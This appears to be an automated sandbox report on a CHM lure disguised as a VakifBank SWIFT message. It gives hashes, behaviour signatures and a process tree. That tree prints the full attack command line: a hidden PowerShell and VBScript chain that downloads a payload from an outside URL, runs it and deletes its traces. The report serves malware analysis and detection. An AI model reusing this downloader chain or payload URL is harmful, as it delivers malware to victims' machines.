Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    27/01/2025, 17:57

General

  • Target

    VakifBank_Swift_Mesaji.chm

  • Size

    75KB

  • MD5

    039c23eb3b3b9c7a83c8647b6fbbd029

  • SHA1

    413a342f9ef90edb0fe4db38d655e6eab77a49ce

  • SHA256

    3956166deff9e06982e311687fd916327c004d13af4b3fbd01fb17e93c110591

  • SHA512

    4f45ff320239c81535347f66b44b57a74dc445278bc61e6fa25c48792e4fcd0d63f080d420457584c64df81d54c4198f8f84a8e331650cce874a32a0fe6c862e

  • SSDEEP

    1536:PTjqBR0MKHC7+qFwItZR3BRRdos7xw9siuUKHj5Cs+0LtpZsAx+9+:7yeMKi7XpZR3BR899svd5ayt7nxf

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 4 IoCs
  • Hide Artifacts: Hidden Window 1 TTPs 1 IoCs

    Windows that would typically be displayed when an application carries out an operation can be hidden.

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\hh.exe
    "C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\VakifBank_Swift_Mesaji.chm
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2788
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c extrac32 /y /C C:\Windows\system32\cscript.exe C:\\Users\\Public\\ript.exe > nul && echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >>C:\\Users\\Public\\aloha.vbs & powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "C:\\Users\\Public\\ript.exe C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/P.cmd C:\\Users\\Public\\df.cmd" & powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "start C:\\Users\\Public\\df.cmd ;Break" & del /q "C:\Users\Public\ript.exe" / A / F / Q / S >nul & del /q "C:\Users\Public\aloha.vbs" / A / F / Q / S >nul & taskkill /F /IM hh.exe & exit
      2⤵
      • Hide Artifacts: Hidden Window
      • Suspicious use of WriteProcessMemory
      PID:2576
      • C:\Windows\system32\extrac32.exe
        extrac32 /y /C C:\Windows\system32\cscript.exe C:\\Users\\Public\\ript.exe
        3⤵
          PID:2688
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "C:\\Users\\Public\\ript.exe C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/P.cmd C:\\Users\\Public\\df.cmd"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2596
          • C:\Users\Public\ript.exe
            "C:\Users\Public\ript.exe" C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/P.cmd C:\\Users\\Public\\df.cmd
            4⤵
            • Executes dropped EXE
            • Modifies system certificate store
            PID:1864
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "start C:\\Users\\Public\\df.cmd ;Break"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2044
          • C:\Windows\system32\cmd.exe
            cmd /c ""C:\Users\Public\df.cmd" "
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2952
            • C:\Windows\system32\extrac32.exe
              extrac32 /y "C:\Users\Public\df.cmd" "C:\Users\Admin\AppData\Local\Temp\x.exe"
              5⤵
                PID:864
              • C:\Users\Admin\AppData\Local\Temp\x.exe
                "C:\Users\Admin\AppData\Local\Temp\x.exe"
                5⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                PID:1284
          • C:\Windows\system32\taskkill.exe
            taskkill /F /IM hh.exe
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:680

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\x.exe

        Filesize

        1.1MB

        MD5

        bbc7fc385a2e1198bc272acb466a70a9

        SHA1

        7352a3101f8e53f694fa1af71e57bda25655ce08

        SHA256

        7babe42bb73034aa6b7b9007ad1a07168f3302eba34a4caff6ce9c5f081fa4f5

        SHA512

        033227e1678e5fb3b844e64dfc7974ad76c9ca15d585935e13f7464749feae14319cc3a4406fd79fa0dff553be9f558938d30caecf09503c8c6a4b389eb3dd58

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

        Filesize

        7KB

        MD5

        e8ee4603cf9e0b583582dc275d6c7d13

        SHA1

        fa503eb9e26f6107620f30a91f91a4d6a0708e79

        SHA256

        70b372767492ca7d6b2280a39bfb8d2e1e633e7a84579f162fd4b05f5885bf1e

        SHA512

        2857c163c5de7103b6bb301699705e3abaaaa432ce3012dc36bedcff8b507ecd7e656f9b7094b18b45acfccefb8b0b4688b9dbe76961d2a1c46b3c0bfca762d8

      • C:\Users\Public\aloha.vbs

        Filesize

        194B

        MD5

        71efa4ec6c67fa5665b1d0c64d60fc25

        SHA1

        f546eda2b94df327b7ad5fa5bb0ba20cd37b2623

        SHA256

        08212be8f6fd3d4312f20a7604807c04da643333f07267c7e9713a452e079898

        SHA512

        7b1bbbb23e21cd011964397860b1cf5bdebbd20b6b3d5317c13ff5b3bdb0223a51c036be2b730254c11725a69c34ab90d2ae24872af788e076914364a82b31d6

      • C:\Users\Public\df.cmd

        Filesize

        1.1MB

        MD5

        298baf7c77327a1641678b6807c230b4

        SHA1

        e8fd19fcc7722c2a1644478339b3b766bb2a08dc

        SHA256

        8f5897f90faa79aafbcc79d2b0e69a5c4c47ca9b9b55206ec7f293baaafc3b35

        SHA512

        11bda296eafcdf657f0cf9bf8302fcf695a701cbff895cbbd203141be6a41693c9544fa778acd901051f271385c22d1fc87d931de0bcc02e0a9db53822155014

      • C:\Users\Public\ript.exe

        Filesize

        152KB

        MD5

        791af7743252d0cd10a30d61e5bc1f8e

        SHA1

        70096a77e202cf9f30c064956f36d14bcbd8f7bb

        SHA256

        e34910c8c4f2051b1b87f80e9b389dfe3583bb3e4da909bb2544f22c2d92cf15

        SHA512

        d564f20748189de62525d2c0d4a199a272e3b273a38bd2ccd0bd7f9141f118eae08223b2a0739cd9bdf73234a0f0fb3566eaf88884462e494d44617bd9ac3ccb

      • memory/1284-62-0x0000000000400000-0x0000000000519000-memory.dmp

        Filesize

        1.1MB

      • memory/1284-61-0x00000000030C0000-0x00000000040C0000-memory.dmp

        Filesize

        16.0MB

      • memory/2044-53-0x000000001B7A0000-0x000000001BA82000-memory.dmp

        Filesize

        2.9MB

      • memory/2044-54-0x0000000001F00000-0x0000000001F08000-memory.dmp

        Filesize

        32KB

      • memory/2596-25-0x000000001B660000-0x000000001B942000-memory.dmp

        Filesize

        2.9MB

      • memory/2596-26-0x0000000002890000-0x0000000002898000-memory.dmp

        Filesize

        32KB